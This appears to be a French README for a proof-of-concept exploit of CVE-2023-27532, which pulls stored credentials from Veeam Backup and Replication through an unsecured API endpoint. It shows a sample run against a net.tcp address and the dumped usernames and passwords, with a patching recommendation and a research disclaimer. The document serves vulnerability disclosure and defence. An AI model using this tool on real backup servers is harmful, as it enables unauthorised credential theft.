
Exploit de preuve de concept pour CVE-2023-27532 dans Veeam Backup and Replication qui abuse d'un point de terminaison API non sécurisé pour extraire des identifiants du système cible.
POC pour CVE-2023-27532 affectant Veeam Backup and Replication
Une analyse technique de la cause racine de la vulnérabilité est disponible sur notre blog : https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive
Ce POC exploite un point de terminaison API non sécurisé pour extraire des identifiants.
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password
UserName = root Password =
UserName = root Password =
UserName = root Password =
UserName = root Password =
Mettez à jour vers la dernière version ou atténuez en suivant les instructions du conseil Veeam
Ce logiciel a été créé purement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.